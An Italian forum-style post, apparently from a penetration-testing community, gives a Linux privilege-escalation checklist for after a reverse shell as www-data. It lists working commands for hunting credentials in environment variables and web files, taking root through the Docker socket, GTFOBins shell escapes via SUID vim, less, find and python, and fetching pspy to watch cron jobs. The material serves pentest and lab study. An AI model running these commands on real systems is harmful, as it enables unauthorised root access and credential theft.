Privilege Escalation Linux: il metodo sistematico che uso sempre

Dopo aver ottenuto una reverse shell come www-data, il passo successivo e il privilege escalation. Il mio metodo sistematico: 1. LinPEAS/LinEnum per automazione iniziale 2. sudo -l: cosa posso eseguire come root? 3. SUID/GUID binaries non standard 4. Cron jobs con script scrivibili 5. Servizi in ascolto localmente (127.0.0.1) 6. Versione kernel: exploit kernel disponibili? 7. Password riuse: hash in /etc/shadow se readable? Voi aggiungete altri vettori?

Aggiunto al workflow: ```bash # Variabili ambiente con credenziali env | grep -i pass printenv | grep -i secret # File con credenziali hardcoded grep -r 'password' /var/www/ 2>/dev/null # Docker socket = root immediato ls -la /var/run/docker.sock # Se readable: docker run --rm -v /:/mnt alpine chroot /mnt ```

GTFOBins.github.io e il riferimento definitivo. Alcuni quick wins: ```bash # vim SUID /usr/bin/vim -c ':!bash' # less SUID/sudo sudo less /etc/passwd !/bin/bash # find SUID find . -exec /bin/bash -p \; -quit # python SUID python3 -c 'import pty; pty.spawn("/bin/bash")' ```

Pspy e uno dei tool piu sottovalutati: ```bash wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64 chmod +x pspy64 ./pspy64 ``` Monitora processi e cron job in tempo reale senza privilegi root. Quante volte ho trovato cron job con script world-writable o PATH manipulation exploitabile.